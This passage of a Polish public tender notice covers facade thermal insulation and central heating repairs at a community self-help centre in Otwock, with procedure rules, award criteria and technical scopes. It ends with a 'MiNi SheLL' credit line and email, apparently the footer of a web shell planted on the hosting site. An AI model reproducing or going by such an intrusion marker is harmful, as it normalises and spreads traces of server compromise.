3.Opłaconą polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia w wymaganej wysokości.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
2.Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.W przypadku dokonywania czynności związanych ze złożeniem wymaganych dokumentów przez osobę/y niewymienioną/e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub no tarialnie uwierzytelnionego odpisu.
2.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) do wniosku należy dołączyć pełnomocnictwo dla Lidera konsorcjum.
3.Wykaz podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy PZP, tj. w rozumieniu ustawy z dnia 16 lutego 2007 o ochronie konkurencji i konsumentów  albo informacja, o tym, że Wykonawca nie należy do grupy kapitałowej.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>70.00</td></tr><tr><td>OKRES GWARANCJI</td><td>20.00</td></tr><tr><td>SKRÓCENIE TERMINU</td><td>10.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1)	zmiana terminu wykonania przedmiotu umowy w przypadku leżącej po stronie Zamawiającego zwłoki związanej z wprowadzeniem Wykonawcy na budowę - przedłużenie terminu obejmować będzie wyłącznie okres zwłoki,
2)	zmiana terminu wykonania przedmiotu umowy w przypadku konieczności wykonania robót dodatkowych w trybie art. 144 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych; przedłużenie terminu obejmować będzie wyłącznie czas niezbędny do udzielenia zamówienia na roboty dodatkowe lub uzupełniające oraz czas niezbędny do wykonania tych robót.
3)	zmiana terminu wykonania umowy w przypadku potwierdzonej przez Zamawiającego konieczności wykonania robót zamiennych lub zastosowania zamiennych materiałów , termin zostanie przedłużony o czas niezbędny do ustalenia zakresu i wartości robót zamiennych oraz wykonanie przez wykonawcę czynności nieprzewidzianych w opisie przedmiotu zamówienia i zakup zamiennych materiałów,
4)	zmiana wynagrodzenia Wykonawcy w przypadku konieczności wykonania robót zamiennych lub zastosowania zamiennych materiałów, podstawą dokonania zmiany jest kosztorys zamienny sporządzony przez Wykonawcę, sprawdzony przez Inspektora Nadzoru oraz zaakceptowany przez upoważnionego przedstawiciela Zamawiającego,
5)	zmiana terminu wykonania umowy spowodowana działaniem siły wyższej o charakterze nadzwyczajnym, przedłużenie terminu obejmować będzie wyłącznie czas występowania siły wyższej i usuwania bezpośrednich skutków jej działania na terenie budowy.
6)	zmiana wynagrodzenia w przypadku zaniechania przez Zamawiającego wykonania części robót,
7)	zmiana terminu wykonania robót , jeżeli w trakcie realizacji umowy wystąpią warunki atmosferyczne uniemożliwiające prawidłowe, zgodne z technologią wykonanie robót; Zamawiający dopuszcza w takiej sytuacji przerwanie robót na czas trwania tych warunków; Wykonawca może przerwać roboty po zabezpieczeniu elewacji przed niekorzystnymi warunkami atmosferycznymi.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 11/10/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>TERMOMODERNIZACJA BUDYNKU ŚRODOWISKOWEGO DOMU SAMOPOMOCY W OTWOCKU<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> Ogólny zakres robót obejmuje:
	demontaż istniejących rur spustowych oraz ponowny ich montaż po wykonaniu warstw izolacji ścian,
	demontaż rynien,
	demontaż drabiny wyłazowej na dach,
	demontaż istniejących obróbek blacharskich,
	demontaż podokienników,
	docieplenie ścian zewnętrznych płytami styropianowymi EPS 033 o grubości 15 cm wraz z wykonaniem tynku cienkowarstwowego silikatowego,
	wykonanie nowej drabiny stalowej,
	malowanie balustrad,
	wymianę ślusarki drzwiowej,
	montaż nowych obróbek blacharskich,
	montaż nowych podokienników,
	ponowny montaż rynien i rur spustowych wraz z montażem koszów zlewowych.
        Szczegółowy zakres prac związanych z termomodernizacją:
a)	Roboty rozbiórkowe.
W związku z remontem elewacji budynku, która przewiduje docieplenie ścian zewnętrznych i zwiększenie grubości ściany o 15 cm, wszystkie obróbki blacharskie i parapety związane z tym nie będą spełniały warunków technicznych i podlegają demontażowi. Istniejące rury spustowe oraz rynny na czas robót należy zdemontować oraz po wykonaniu prac dociepleniowych ponownie zamontować.
Istniejąca ślusarka drzwiowa od strony zachodniej nie spełnia wymogów termicznych, co kwalifikuje ją do demontażu.
Wszelkie drobne elementy wyposażenia budynku uchwyty do flag, tablice informacyjne, numery administracyjne, oprawy oświetleniowe oraz sygnalizację instalacji alarmowej należy zdemontować, oczyścić, pomalować elementy stalowe farbą antykorozyjną i ponownie zamontować po wykonaniu robót remontowych.
b)	Wymiana ślusarki drzwiowej.
W związku z koniecznością demontażu ślusarki drzwiowej projektuje się nową ślusarkę drzwiową z profili aluminiowych wg wykazu. Średni współczynnik przenikania ciepła U=1,3 W/m2K zgodny z wymaganiami dotyczących izolacyjności cieplnej ważnych od dnia 01.01.2021 r.
Drzwi pełne, okucia standardowe, klamki w skrzydłach w środku wysokości, jeden zamek zwykły typu Yale w drzwiach zewnętrznych. Ślusarka drzwiowa w kolorze białym.
Uzupełnienie tynków ościeży wewnętrznych, malowanych farbą emulsyjną.
W trakcie wykonywania robót należy zabezpieczyć posadzkę i elementy wyposażenia pomieszczeń przed uszkodzeniem, oraz sprzątać sukcesywnie stanowiska pracy.
c)	Roboty elewacyjne docieplenie ścian.
Przed przystąpieniem do robót dociepleniowych należy sprawdzić przyczepność istniejącego tynku do podłoża i wszystkie odspojone, uszkodzone, zawilgocone warstwy tynku skuć. Ubytki wypełnić dodatkową warstwą kleju lub zaprawą cementową. Zaprojektowano zgodnie z dostępnością materiałów o odpowiedniej grubości dla danego asortymentu na rynku, następujące grubości warstw dociepleniowych:
	docieplenie ścian styropianem EPS 033 o grubości 15 cm, klasa reakcji na ogień E, deklarowany współczynnik przewodzenia ciepła d0,033 W/mK.
	Docieplenie ścian zewnętrznych budynku przyjęto wykonanie metodą BSO (lekką -mokrą) polegającą na pokryciu powierzchni bezspoinową powłoką składającą się z następujących warstw: warstwa izolacyjna  płyty styropianowe-frezowane,
	warstwa wzmacniająca  wklejona w zaprawę klejącą siatka z włókna szklanego,
	warstwa zewnętrzna  tynk sylikatowy, w części cokołowej tynk żywiczno-mineralny (marmolit).
Kolorystykę elewacji i cokołu należy uzgodnić z Dyrekcją Środowiskowego Domu Samopomocy.
d)	Docieplenie daszków nad wejściami do budynków.
Projektuje się docieplenia daszka od spodu układając płyty styropianowe gr. 5 cm o współczynniku przewodzenia ciepła =0,033 W/m2 oraz tynk cienkowarstwowy. Natomiast od góry należy ułożyć płyty styropianowe laminowane dwustronnie papą gr. 5 cm o współczynniku przewodzenia ciepła =0,033 W/m2.
e)	Montaż nowych obróbek blacharskich i podokienników.
Należy wykonać nowe obróbki blacharskie z blachy stalowej powlekanej w kolorze brąz o minimalnej grubości 0,55 mm. 
Należy również zamontować kosze zlewowe do istniejących rur spustowych.
f)	Malowanie balustrad.
g)	Wykonanie nowej drabinki stalowej.
Projektuje się wykonanie nowej drabiny ze stali ocynkowanej z rur  51x2,3 mm. Drabinę należy wykonać zgodnie z warunkami technicznymi.
h)	Wykonanie instalacji odgromowej.
Zakres wykonania instalacji odgromowej polega na odtworzeniu po wykonanych robotach dekarskich istniejącej instalacji odgromowej. Należy zastosować nowe materiały o tych samych profilach i przekrojach co istniejące.
Po wykonaniu instalacji należy sporządzić protokół z pomiarów rezystancji uziemienia (zgodnie z obowiązującymi normami) i dostarczyć Zamawiającemu<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45215213-3,
                    45421100-5,
                    45450000-6,
                    45312310-3,
                    45442100-8,
                    45410000-4,
                    45443000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 02/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>70.00</td></tr><tr><td>OKRES GWARANCJI</td><td>20.00</td></tr><tr><td>SKRÓCENIE TERMINU</td><td>10.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>REMONT INSTALACJI CENTRALNEGO OGRZEWANIA W BUDYNKU ŚRODOWISKOWEGO DOMU SAMOPOMOCY W OTWOCKU<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>REMONT INSTALACJI CENTRALNEGO OGRZEWANIA W BUDYNKU ŚRODOWISKOWEGO DOMU SAMOPOMOCY W OTWOCKU

Wykonanie remontu instalacji centralnego ogrzewania należy wykonać zgodnie z projektem budowlano-wykonawczym stanowiącym załącznik do SIWZ.
        Ogólny zakres robót obejmuje:
	demontaż istniejących rur centralnego ogrzewania
	demontaż istniejących grzejników
	zmiana charakterystyki pracy istniejącego zestawu pompowo-mieszającego
	montaż zaworów podpionowych oraz grzejnikowych
	montaż nowego orurowania
	montaż nowej izolacji 
	montaż nowych grzejników
	przeprowadzenie próby szczelności
	wykonanie prac naprawczych poinstalacyjnych

        Szczegółowy zakres prac związanych z termomodernizacją.
a)	Instalacja centralnego ogrzewania
Należy wykonać instalację centralnego ogrzewania wodną, dwururową, pompową z rozdziałem dolnym zasilaną z istniejącej kotłowni. Rozprowadzenie instalacji systemem trójnikowym  po trasie demontowanej, istniejącej instalacji. Jako elementy grzejne projektuje się grzejniki.
Miejscem połączenia istniejącej instalacji z projektowaną jest rurociąg stalowy DN40 podłączony do istniejącego rozdzielacza nr 7 (wg schematu kotłowni). Istniejący zestaw pompowo  mieszający będzie wykorzystany dla projektowanej instalacji. Należy dostosować krzywą grzewczą na regulatorze sterującym zaworem trójdrogowym. Istniejąca pompa typu Grundfos UPE 32-60 jest pompą zmiennoobrotową. Należy zmienić jej charakterystykę, tak aby dopasować instalację do warunków projektowych. Parametry pracy pompy podano w raporcie załączonym na końcu projektu.
 
b)	Przewody
Przewody rozdzielcze instalacji centralnego ogrzewania od rozdzielacza w kotłowni wykonać z rur wielowarstwowych Pert-Al-Pehd.
Przewody rozprowadzające należy prowadzić po wierzchu ścian.
Przewody należy prowadzić łagodnymi łukami w celu uzyskania samokompensacji. Prace montażowe wykonywać zgodnie z zaleceniami producentów.
Przewody rozdzielcze w piwnicy o dużych średnicach należy izolować otulinami z pianki poliuretanowej.
c)	Grzejniki
Jako odbiorniki ciepła wykonać grzejniki stalowe a w łazienkach grzejniki drabinkowe zgodnie z projektem. Każde podłączenie grzejnika powinno składać się z zaworu grzejnikowego na zasileniu i zaworu odcinającego na powrocie.
Zdemontowane grzejniki należy pozostawić w miejscu wskazanym przez Zamawiającego.
d)	Armatura
Dobór oraz miejsca umieszczenia armatury został przedstawiony w projekcie budowlano-wykonawczym.
e)	 Próba szczelności
Po wykonaniu instalacji należy sporządzić protokół z próby szczelności instalacji centralnego ogrzewania (ciśnienie robocze próby 4 bary) i dostarczyć Zamawiającemu.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45331100-7, 45231110-9,
                    45330000-9,
                    45320000-6,
                    45331000-6,
                    45442100-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 02/12/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>70.00</td></tr><tr><td>OKRES GWARANCJI</td><td>20.00</td></tr><tr><td>SKRÓCENIE TERMINU</td><td>10.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com